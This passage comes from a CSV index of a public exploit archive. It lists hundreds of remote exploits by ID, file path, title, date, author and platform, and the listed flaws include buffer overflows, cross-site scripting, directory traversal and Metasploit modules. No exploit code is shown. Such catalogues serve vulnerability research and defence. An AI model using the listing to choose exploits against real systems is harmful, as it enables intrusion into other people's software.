Su",remote,windows, +23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple, +23714,exploits/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow",2004-02-13,badpack3t,remote,windows, +23717,exploits/windows/remote/23717.txt,"Microsoft Windows XP - Help and Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",remote,windows, +23721,exploits/hardware/remote/23721.txt,"Linksys WAP55AG 1.0.7 - SNMP Community String Insecure Configuration",2004-02-18,"NN Poster",remote,hardware, +23728,exploits/linux/remote/23728.txt,"Metamail 2.7 - Multiple Buffer Overflow / Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",remote,linux, +23730,exploits/windows/remote/23730.txt,"AOL Instant Messenger 4.x/5.x - Buddy Icon Predictable File Location",2004-02-19,"Michael Evanchik",remote,windows, +23732,exploits/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow (1)",2004-02-20,PaLbOsA,remote,windows, +23733,exploits/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,remote,windows, +23734,exploits/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,remote,windows, +23735,exploits/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Authenticated Remote Command Execution",2012-12-29,xistence,remote,hardware, +23736,exploits/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,remote,windows, +23737,exploits/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,remote,windows, +23740,exploits/linux/remote/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,remote,linux, +23741,exploits/windows/remote/23741.c,"Proxy-Pro Professional GateKeeper 4.7 Web Proxy - Buffer Overrun",2004-02-23,kralor,remote,windows, +23751,exploits/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal",2004-02-24,"Jeremy Bae",remote,windows, +23754,exploits/windows/remote/23754.rb,"Microsoft Internet Explorer - CDwnBindInfo Object Use-After-Free (Metasploit)",2012-12-31,Metasploit,remote,windows, +23756,exploits/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 - Cross-Site Scripting",2004-02-24,"Rafel Ivgi The-Insider",remote,multiple, +23758,exploits/windows/remote/23758.txt,"GWeb HTTP Server 0.5/0.6 - Directory Traversal",2004-02-24,"Donato Ferrante",remote,windows, +23763,exploits/windows/remote/23763.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (4)",2004-02-26,lion,remote,windows, +23764,exploits/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 - Error Page Cross-Site Scripting",2004-02-26,Soby,remote,hardware, +23766,exploits/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage",2004-02-27,iDefense,remote,windows, +23768,exploits/windows/remote/23768.txt,"Microsoft Internet Explorer 6 - window.open Media Bar Cross-Zone Scripting",2003-09-11,Jelmer,remote,windows, +23771,exploits/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x - Multiple Format String Vulnerabilities",2004-03-01,"Ulf Harnhammar",remote,linux, +23772,exploits/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Remote Overflow",2004-03-01,CMN,remote,linux, +23776,exploits/windows/remote/23776.txt,"Software602 602Pro LAN Suite - Web Mail Cross-Site Scripting",2004-03-01,"Rafel Ivgi The-Insider",remote,windows, +23777,exploits/linux/remote/23777.txt,"Squid Proxy 2.4/2.5 - NULL URL Character Unauthorized Access",2004-03-01,"Mitch Adair",remote,linux, +23785,exploits/windows/remote/23785.rb,"Microsoft Internet Explorer - CButton Object Use-After-Free (Metasploit)",2013-01-02,Metasploit,remote,windows, +23790,exploits/windows/remote/23790.html,"Microsoft Internet Explorer 5 - window.open Search Pane Cross-Zone Scripting",2003-09-10,"Liu Die Yu",remote,windows, +23794,exploits/linux/remote/23794.txt,"PWebServer 0.3.x - Directory Traversal",2004-03-08,"Donato Ferrante",remote,linux, +23796,exploits/windows/remote/23796.html,"Microsoft Outlook 2002 - 'Mailto' Quoting Zone Bypass",2004-03-09,shaun2k2,remote,windows, +23800,exploits/osx/remote/23800.txt,"Apple Safari 1.x - Cookie Directory Traversal",2004-03-10,"Corsaire Limited",remote,osx, +23801,exploits/linux/remote/23801.txt,"GNU MyProxy 20030629 - Cross-Site Scripting",2004-03-11,"Donato Ferrante",remote,linux, +23802,exploits/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 - Arbitrary File Access",2004-03-11,"Donato Ferrante",remote,linux, +23803,exploits/linux/remote/23803.txt,"Pegasi Web Server 0.2.2 - Error Page Cross-Site Scripting",2004-03-11,"Donato Ferrante",remote,linux, +23804,exploits/cgi/remote/23804.txt,"cPanel 5/6/7/8/9 - Resetpass Remote Command Execution",2004-03-11,"Arab VieruZ",remote,cgi, +23808,exploits/hardware/remote/23808.txt,"IP3 Networks IP3 NetAccess Appliance - SQL Injection",2004-03-12,"Syam Yanuar",remote,hardware, +23811,exploits/linux/remote/23811.c,"MathoPD 1.x - Remote Buffer Overflow",2003-11-02,aion,remote,linux, +23836,exploits/windows/remote/23836.txt,"IBM Lotus Domino 6/7 - HTTP webadmin.nsf Directory Traversal",2004-03-17,dr_insane,remote,windows, +23837,exploits/windows/remote/23837.txt,"IBM Lotus Domino 6.5.1 - HTTP webadmin.nsf Quick Console Cross-Site Scripting",2004-03-17,dr_insane,remote,windows, +23847,exploits/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ - Parsing Buffer Overflow",2004-03-26,Sam,remote,windows, +23848,exploits/linux/remote/23848.txt,"SquidGuard 1.x - NULL URL Character Unauthorized Access",2004-03-19,"Petko Popadiyski",remote,linux, +23855,exploits/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Remote Command Execution",2013-01-03,dun,remote,hardware, +23856,exploits/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion (Metasploit)",2013-01-03,Metasploit,remote,php, +23864,exploits/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal",2004-03-22,"Donato Ferrante",remote,linux, +23871,exploits/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - 'TargetName' Cross-Site Scripting",2004-03-22,"Richard Maudsley",remote,windows, +23873,exploits/multiple/remote/23873.c,"Mythic Entertainment Dark Age of Camelot 1.6x - Encryption Key Signing",2004-03-23,"Todd Chapman",remote,multiple, +23879,exploits/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal",2004-03-24,wirepair,remote,windows, +23880,exploits/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution",2004-03-24,wirepair,remote,windows, +23881,exploits/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun / Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",remote,linux, +23887,exploits/windows/remote/23887.rb,"Enterasys NetSight - 'nssyslogd.exe' Remote Buffer Overflow (Metasploit)",2013-01-04,Metasploit,remote,windows, +23969,exploits/windows/remote/23969.rb,"IBM Cognos - 'tm1admsd.exe' Remote Overflow (Metasploit)",2013-01-08,Metasploit,remote,windows, +23893,exploits/multiple/remote/23893.txt,"WebCT Campus Edition 3.8/4.x - HTML Injection",2004-03-29,"Simon Boulet",remote,multiple, +23903,exploits/windows/remote/23903.html,"Microsoft Internet Explorer 6 - HTML Form Status Bar Misrepresentation",2004-03-31,http-equiv,remote,windows, +23905,exploits/windows/remote/23905.txt,"ADA IMGSVR 0.4 - Remote Directory Listing",2004-04-01,"Donato Ferrante & Dr_insane",remote,windows, +23906,exploits/windows/remote/23906.txt,"ADA IMGSVR 0.4 - Arbitrary File Download",2004-04-01,"Donato Ferrante",remote,windows, +23909,exploits/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal",2004-04-05,dr_insane,remote,windows, +23926,exploits/windows/remote/23926.txt,"Mcafee FreeScan CoMcFreeScan Browser - Information Disclosure",2004-04-07,"S G Masood",remote,windows, +23936,exploits/linux/remote/23936.pl,"lcdproc lcdd 0.x/4.x - Multiple Vulnerabilities",2004-04-08,wsxz,remote,linux, +33402,exploits/linux/remote/33402.txt,"Ruby on Rails 2.3.5 - 'protect_from_forgery' Cross-Site Request Forgery",2009-12-14,p0deje,remote,linux, +23987,exploits/cgi/remote/23987.txt,"SurgeLDAP 1.0 - 'User.cgi' Directory Traversal",2004-04-12,dr_insane,remote,cgi, +24012,exploits/windows/remote/24012.html,"WinSCP 3.5.6 - Long URI Handling Memory Corruption",2004-04-16,"Luca Ercoli",remote,windows, +24017,exploits/windows/remote/24017.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)",2013-01-10,sickness,remote,windows, +24018,exploits/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,remote,php, +24019,exploits/multiple/remote/24019.rb,"Ruby on Rails - XML Processor YAML Deserialization Code Execution (Metasploit)",2013-01-10,Metasploit,remote,multiple, +24020,exploits/windows/remote/24020.rb,"Microsoft Internet Explorer - Option Element Use-After-Free (MS11-081) (Metasploit)",2013-01-10,Metasploit,remote,windows, +24021,exploits/windows/remote/24021.rb,"Honeywell Tema Remote Installer - ActiveX Remote Code Execution (Metasploit)",2013-01-10,Metasploit,remote,windows, +24024,exploits/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution",2004-04-19,"Rafel Ivgi The-Insider",remote,windows, +24025,exploits/windows/remote/24025.txt,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Information Disclosure",2004-04-19,"Rafel Ivgi The-Insider",remote,windows, +24028,exploits/windows/remote/24028.pl,"Kinesphere Corporation Exchange POP3 4.0/5.0 - Remote Buffer Overflow",2004-04-20,"securma massine",remote,windows, +24030,exploits/multiple/remote/24030.c,"Multiple Vendor - TCP Sequence Number Approximation (1)",2004-03-05,"Matt Edman",remote,multiple, +24031,exploits/multiple/remote/24031.pl,"Multiple Vendor - TCP Sequence Number Approximation (2)",2004-04-20,"Paul A. Watson",remote,multiple, +24032,exploits/multiple/remote/24032.txt,"Multiple Vendor - TCP Sequence Number Approximation (3)",2004-04-20,"Paul Watson",remote,multiple, +24033,exploits/multiple/remote/24033.pl,"Multiple Vendor - TCP Sequence Number Approximation (4)",2004-04-23,K-sPecial,remote,multiple, +24038,exploits/linux/remote/24038.txt,"Xine 0.9.x and Xine-Lib 1 - Multiple Remote File Overwrite Vulnerabilities",2004-04-22,anonymous,remote,linux, +24040,exploits/multiple/remote/24040.txt,"PISG 0.54 - IRC Nick HTML Injection",2004-04-22,shr3kst3r,remote,multiple, +24041,exploits/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File Overwrite",2004-04-22,"Luigi Auriemma",remote,multiple, +24045,exploits/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (Metasploit) (1)",2013-01-11,Metasploit,remote,java, +24065,exploits/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,remote,hardware, +24067,exploits/unix/remote/24067.c,"LHA 1.x - Remote Buffer Overflow / Directory Traversal",2004-04-30,N4rK07IX,remote,unix, +24069,exploits/windows/remote/24069.html,"Microsoft Internet Explorer 6 - Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,remote,windows, +24076,exploits/windows/remote/24076.txt,"Sambar Server 5.x - Open Proxy / Authentication Bypass",2003-01-30,"David Endler",remote,windows, +24077,exploits/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer - Directory Traversal",2004-05-03,"Imperva Application Defense Center",remote,windows, +24079,exploits/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String",2004-05-03,"Nilanjan De",remote,linux, +24084,exploits/multiple/remote/24084.py,"Nagios3 - 'history.cgi' Remote Command Execution",2013-01-13,blasty,remote,multiple, +24093,exploits/linux/remote/24093.c,"Exim Sender 3.35 - Verification Remote Stack Buffer Overrun",2004-05-06,newroot,remote,linux, +24097,exploits/windows/remote/24097.c,"MyWeb HTTP Server 3.3 - GET Buffer Overflow",2004-05-06,badpack3t,remote,windows, +24098,exploits/windows/remote/24098.txt,"Qualcomm Eudora 6.x - Embedded Hyperlink URI Obfuscation",2004-05-08,"Brett Glass",remote,windows, +24101,exploits/windows/remote/24101.txt,"Microsoft Outlook 2003 - Predictable File Location",2004-05-10,http-equiv,remote,windows, +24102,exploits/windows/remote/24102.txt,"Microsoft Internet Explorer 4/5/6 - Embedded Image URI Obfuscation",2004-05-10,http-equiv,remote,windows, +24105,exploits/linux/remote/24105.txt,"National Science Foundation Squid Proxy 2.3 - Internet Access Control Bypass",2004-05-10,"Nuno Costa",remote,linux, +24106,exploits/linux/remote/24106.txt,"Open WebMail 1.x/2.x - Remote Command Execution Variant",2004-05-10,Nullbyte,remote,linux, +24114,exploits/windows/remote/24114.html,"Microsoft Outlook 2003 - Mail Client E-mail Address Verification",2004-05-11,http-equiv,remote,windows, +24115,exploits/hardware/remote/24115.c,"Linksys - DHCP Information Disclosure",2004-05-31,"Jon Hart",remote,hardware, +24116,exploits/windows/remote/24116.txt,"Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification",2004-05-13,"Karol Wiesek",remote,windows, +24117,exploits/windows/remote/24117.txt,"Microsoft Internet Explorer 6 - Codebase Double Backslash Local Zone File Execution",2003-11-25,"Liu Die Yu",remote,windows, +24118,exploits/windows/remote/24118.txt,"Microsoft Outlook Express 6.0 - URI Obfuscation",2004-05-13,http-equiv,remote,windows, +24120,exploits/linux/remote/24120.pl,"LHA 1.x - 'extract_one' Multiple Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",remote,linux, +24121,exploits/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",remote,osx, +24125,exploits/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",remote,windows, +24129,exploits/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - GET Buffer Overflow",2004-04-23,CoolICE,remote,windows, +24133,exploits/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,remote,windows, +24136,exploits/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",remote,linux, +24137,exploits/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",remote,multiple, +24140,exploits/hardware/remote/24140.txt,"NETGEAR RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",remote,hardware, +24148,exploits/multiple/remote/24148.txt,"Sun Java System Application Server 7.0/8.0 - Remote Installation Full Path Disclosure",2004-05-27,"Marc Schoenefeld",remote,multiple, +24149,exploits/php/remote/24149.php,"PHP 4/5 - Input/Output Wrapper Remote File Inclusion Function Command Execution",2004-05-27,Slythers,remote,php, +24187,exploits/windows/remote/24187.txt,"Microsoft Internet Explorer 6 - ADODB.Stream Object File Installation",2003-08-23,Jelmer,remote,windows, +24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple, +24159,exploits/linux/remote/24159.rb,"Nagios3 - 'history.cgi' Host Command Execution (Metasploit)",2013-01-16,Metasploit,remote,linux, +24160,exploits/linux/remote/24160.txt,"SquirrelMail 1.x - Email Header HTML Injection",2004-05-31,"Roman Medina",remote,linux, +24161,exploits/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - 'show.asp?show' Cross-Site Scripting",2004-06-01,"Oliver Karow",remote,windows, +24162,exploits/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - 'showperf.asp?title' Cross-Site Scripting",2004-06-01,"Oliver Karow",remote,windows, +24163,exploits/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access",2004-06-01,"Oliver Karow",remote,windows, +24165,exploits/linux/remote/24165.pl,"Firebird 1.0 - Unauthenticated Remote Database Name Buffer Overrun",2004-06-01,wsxz,remote,linux, +24174,exploits/windows/remote/24174.txt,"Microsoft Internet Explorer 6 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",remote,windows, +24179,exploits/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure",2004-06-08,"Vickenty Fesunov",remote,linux, +24196,exploits/windows/remote/24196.txt,"Mozilla Browser 1.6/1.7 - URI Obfuscation",2004-06-14,http-equiv,remote,windows, +24205,exploits/linux/remote/24205.txt,"Novell NCP - Unauthenticated Remote Command Execution",2013-01-18,"Gary Nilson",remote,linux, +24230,exploits/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure",2004-06-22,"Konstantin V. Gavrilenko",remote,hardware, +24206,exploits/multiple/remote/24206.rb,"Jenkins CI Script Console - Command Execution (Metasploit)",2013-01-18,"Spencer McIntyre",remote,multiple, +24213,exploits/windows/remote/24213.txt,"Microsoft Internet Explorer 5.0.1 - Wildcard DNS Cross-Site Scripting",2004-06-15,"bitlance winter",remote,windows, +24218,exploits/windows/remote/24218.cpp,"Symantec Enterprise Firewall 7.0/8.0 - DNSD DNS Cache Poisoning",2004-06-15,fryxar,remote,windows, +24219,exploits/windows/remote/24219.txt,"IBM ACPRunner 1.2.5 - ActiveX Control Dangerous Method",2004-06-16,"eEye Digital Security Team",remote,windows, +24220,exploits/windows/remote/24220.html,"IBM EGatherer 2.0 - ActiveX Control Dangerous Method",2004-06-01,"eEye Digital Security Team",remote,windows, +24221,exploits/linux/remote/24221.pl,"Asterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities",2004-06-18,kfinisterre@secnetops.com,remote,linux, +24223,exploits/linux/remote/24223.py,"Rlpr 2.0 - 'msg()' Multiple Vulnerabilities",2004-06-19,jaguar@felinemenace.org,remote,linux, +24224,exploits/multiple/remote/24224.c,"TildeSlash Monit 1-4 - Authentication Handling Buffer Overflow",2004-06-04,"Nilanjan De",remote,multiple, +24226,exploits/hardware/remote/24226.txt,"D-Link AirPlus DI-614+ / DI-624 / DI-704 - DHCP Log HTML Injection",2004-06-21,c3rb3r,remote,hardware, +24246,exploits/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 - Cross-Site Scripting",2004-07-20,"Donato Ferrante",remote,multiple, +24249,exploits/windows/remote/24249.html,"Microsoft Internet Explorer 6 - Shell.Application Object Script Execution",2004-07-03,http-equiv,remote,windows, +24250,exploits/multiple/remote/24250.pl,"MySQL 4.1/5.0 - Authentication Bypass",2004-07-05,"Eli Kara",remote,multiple, +24253,exploits/multiple/remote/24253.txt,"12Planet Chat Server 2.9 - Cross-Site Scripting",2004-07-05,"Donato Ferrante",remote,multiple, +24259,exploits/linux/remote/24259.c,"Ethereal 0.x - Multiple iSNS / SMB / SNMP Protocol Dissector Vulnerabilities",2004-08-05,"Rémi Denis-Courmont",remote,linux, +24262,exploits/windows/remote/24262.html,"Opera Web Browser 7.5x - IFrame OnLoad Address Bar URL Obfuscation",2004-07-08,"bitlance winter",remote,windows, +24263,exploits/windows/remote/24263.txt,"Mozilla 1.7 - External Protocol Handler",2004-07-08,"Keith McCanless",remote,windows, +24264,exploits/multiple/remote/24264.java,"Sun Java Virtual Machine 1.x - 'Font.createFont' Method Insecure Temporary File Creation",2004-07-09,Jelmer,remote,multiple, +24265,exploits/windows/remote/24265.html,"Microsoft Internet Explorer 5.0.1 - JavaScript Method Assignment Cross-Domain Scripting",2004-07-12,Paul,remote,windows, +24266,exploits/windows/remote/24266.txt,"Microsoft Internet Explorer 5.0.1 - Popup.show Mouse Event Hijacking",2004-07-12,Paul,remote,windows, +24268,exploits/multiple/remote/24268.txt,"Code-Crafters Ability Mail Server 1.18 - 'errormsg' Cross-Site Scripting",2004-07-12,dr_insane,remote,multiple, +24272,exploits/multiple/remote/24272.rb,"Jenkins - Script-Console Java Execution (Metasploit)",2013-01-21,Metasploit,remote,multiple, +24273,exploits/php/remote/24273.rb,"PHP-Charts 1.0 - PHP Code Execution (Metasploit)",2013-01-21,Metasploit,remote,php, +24276,exploits/windows/remote/24276.txt,"Mozilla Browser 0.9/1.x Cache File - Multiple Vulnerabilities",2004-07-13,"Mind Warper",remote,windows, +24280,exploits/php/remote/24280.txt,"PHP 4.x/5.0 - 'Strip_Tags()' Function Bypass",2004-07-14,"Stefan Esser",remote,php, +24297,exploits/windows/remote/24297.pl,"Serena TeamTrack 6.1.1 - Remote Authentication Bypass",2004-07-21,"Noam Rathaus",remote,windows, +24304,exploits/windows/remote/24304.txt,"Imatix Xitami 2.5 - Server-Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",remote,windows, +24308,exploits/multiple/remote/24308.rb,"Java Applet - Method Handle Remote Code Execution (Metasploit)",2013-01-24,Metasploit,remote,multiple, +24309,exploits/java/remote/24309.rb,"Java Applet - AverageRangeStatisticImpl Remote Code Execution (Metasploit)",2013-01-24,Metasploit,remote,java, +24310,exploits/unix/remote/24310.rb,"ZoneMinder Video Server - packageControl Command Execution (Metasploit)",2013-01-24,Metasploit,remote,unix, +24312,exploits/linux/remote/24312.html,"Mozilla Browser 0.8/0.9/1.x - Refresh Security Property Spoofing",2004-07-26,E.Kellinis,remote,linux, +24321,exploits/multiple/remote/24321.rb,"Movable Type 4.2x/4.3x - Web Upgrade Remote Code Execution (Metasploit)",2013-01-07,Metasploit,remote,multiple, +24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple, +24323,exploits/multiple/remote/24323.rb,"Novell eDirectory 8 - Remote Buffer Overflow (Metasploit)",2013-01-24,Metasploit,remote,multiple, +24325,exploits/multiple/remote/24325.html,"Opera Web Browser 7.53 - Location Replace URI Obfuscation",2004-07-27,"bitlance winter",remote,multiple, +24326,exploits/cgi/remote/24326.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Open Proxy Relay",2004-07-27,"Phil Robinson",remote,cgi, +24327,exploits/cgi/remote/24327.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Arbitrary File Access",2004-07-27,"Phil Robinson",remote,cgi, +24328,exploits/windows/remote/24328.txt,"Microsoft Internet Explorer 5.0.1 - Style Tag Comment Memory Corruption",2004-07-08,"Phuong Nguyen",remote,windows, +24336,exploits/cgi/remote/24336.txt,"MyServer 0.6.2 - 'math_sum.mscgi' Multiple Cross-Site Scripting Vulnerabilities",2004-07-30,dr_insane,remote,cgi, +24337,exploits/cgi/remote/24337.txt,"myServer 0.6.2 - 'math_sum.mscgi' Multiple Remote Overflows",2004-07-30,dr_insane,remote,cgi, +24338,exploits/linux/remote/24338.c,"Citadel/UX 5.9/6.x - 'Username' Remote Buffer Overflow (1)",2004-07-30,CoKi,remote,linux, +24339,exploits/linux/remote/24339.c,"Citadel/UX 5.9/6.x - 'Username' Remote Buffer Overflow (2)",2004-07-30,Nebunu,remote,linux, +24342,exploits/cgi/remote/24342.txt,"Webcam Corp Webcam Watchdog 4.0.1 - 'sresult.exe' Cross-Site Scripting",2004-08-02,dr_insane,remote,cgi, +24345,exploits/windows/remote/24345.txt,"IBM Tivoli Directory Server 3.2.2/4.1 - LDACGI Directory Traversal",2004-08-02,anonymous,remote,windows, +24350,exploits/windows/remote/24350.txt,"Acme thttpd 2.0.7 - Directory Traversal",2004-08-04,CoolICE,remote,windows, +24353,exploits/unix/remote/24353.sql,"Oracle 9i - Multiple Vulnerabilities",2004-08-04,"Marco Ivaldi",remote,unix, +24354,exploits/windows/remote/24354.txt,"Microsoft Internet Explorer 6 - mms Protocol Handler Executable Command Line Injection",2004-08-05,"Nicolas Robillard",remote,windows, +24361,exploits/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (2)",2004-08-09,jsk,remote,linux, +24363,exploits/windows/remote/24363.txt,"clearswift MIMEsweeper for Web 4.0/5.0 - Directory Traversal",2004-07-11,"Kroma Pierre",remote,windows, +24376,exploits/multiple/remote/24376.txt,"Opera Web Browser 7.5 - Resource Detection",2004-07-17,"GreyMagic Software",remote,multiple, +24387,exploits/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 - HTML Injection",2004-08-20,"Audun Larsen",remote,multiple, +24404,exploits/windows/remote/24404.txt,"Gadu-Gadu 6.0 - File Download Filename Obfuscation",2004-08-23,"Bartosz Kwitkowski",remote,windows, +24407,exploits/windows/remote/24407.txt,"Microsoft Internet Explorer 6 - Resource Detection",2004-08-24,"GreyMagic Software",remote,windows, +24409,exploits/windows/remote/24409.txt,"Working Resources BadBlue 1.7.x/2.x - Unauthorized Proxy Relay",2002-12-11,Texonet,remote,windows, +24413,exploits/windows/remote/24413.txt,"NullSoft Winamp 2.4 < 5.0.4 - '.wsz' Remote Code Execution",2004-07-26,anonymous,remote,windows, +24414,exploits/multiple/remote/24414.txt,"keene digital media server 1.0.2 - Directory Traversal variant",2004-08-26,"GulfTech Security",remote,multiple, +24417,exploits/windows/remote/24417.txt,"Xedus Web Server 1.0 - test.x 'Username' Cross-Site Scripting",2004-09-30,"James Bercegay",remote,windows, +24418,exploits/windows/remote/24418.txt,"Xedus Web Server 1.0 - testgetrequest.x 'Username' Cross-Site Scripting",2004-09-30,"James Bercegay",remote,windows, +24419,exploits/windows/remote/24419.txt,"Xedus Web Server 1.0 - Traversal Arbitrary File Access",2004-09-30,"James Bercegay",remote,windows, +24460,exploits/windows/remote/24460.rb,"VMware OVF Tools - Format String (Metasploit) (1)",2013-02-06,Metasploit,remote,windows, +24434,exploits/multiple/remote/24434.rb,"Ruby on Rails - JSON Processor YAML Deserialization Code Execution (Metasploit)",2013-01-29,Metasploit,remote,multiple, +24444,exploits/php/remote/24444.rb,"DataLife Engine - 'preview.php' PHP Code Injection (Metasploit)",2013-02-01,Metasploit,remote,php, +24455,exploits/unix/remote/24455.rb,"Portable UPnP SDK - 'unique_service_name()' Remote Code Execution (Metasploit)",2013-02-05,Metasploit,remote,unix, +24461,exploits/windows/remote/24461.rb,"VMware OVF Tools - Format String (Metasploit) (2)",2013-02-12,Metasploit,remote,windows, +24467,exploits/windows/remote/24467.rb,"ActFax 5.01 - RAW Server (Metasploit)",2013-02-07,"Craig Freyman",remote,windows, +24479,exploits/windows/remote/24479.py,"Freefloat FTP Server 1.0 - 'Raw' Remote Buffer Overflow",2013-02-11,superkojiman,remote,windows, +24490,exploits/windows/remote/24490.rb,"Novell Groupwise Client - 'gwcls1.dll' ActiveX Remote Code Execution (Metasploit)",2013-02-12,Metasploit,remote,windows, +24494,exploits/hardware/remote/24494.rb,"Polycom HDX - Telnet Authentication Bypass (Metasploit)",2013-02-14,"Paul Haas",remote,hardware,23 +24495,exploits/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)",2013-02-14,"Scott Bell",remote,windows, +24502,exploits/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)",2013-02-14,Metasploit,remote,windows, +24526,exploits/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,remote,windows, +24527,exploits/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH / DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,remote,windows, +24528,exploits/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload (Metasploit)",2013-02-20,Metasploit,remote,windows, +24529,exploits/php/remote/24529.rb,"OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-20,Metasploit,remote,php, +24538,exploits/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)",2013-02-23,Metasploit,remote,windows, +24539,exploits/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (Metasploit) (2)",2013-02-25,Metasploit,remote,multiple, +24547,exploits/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php, +24548,exploits/php/remote/24548.rb,"Glossword 1.8.8 < 1.8.12 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php, +24549,exploits/php/remote/24549.rb,"PolarPearCMS - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-26,Metasploit,remote,php, +24557,exploits/windows/remote/24557.py,"Sami FTP Server 2.0.1 - LIST Command Buffer Overflow",2013-03-01,superkojiman,remote,windows, +24567,exploits/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation",2004-09-03,"Alexander Kornbrust",remote,multiple, +24568,exploits/windows/remote/24568.html,"Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,remote,windows, +24571,exploits/windows/remote/24571.html,"NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control 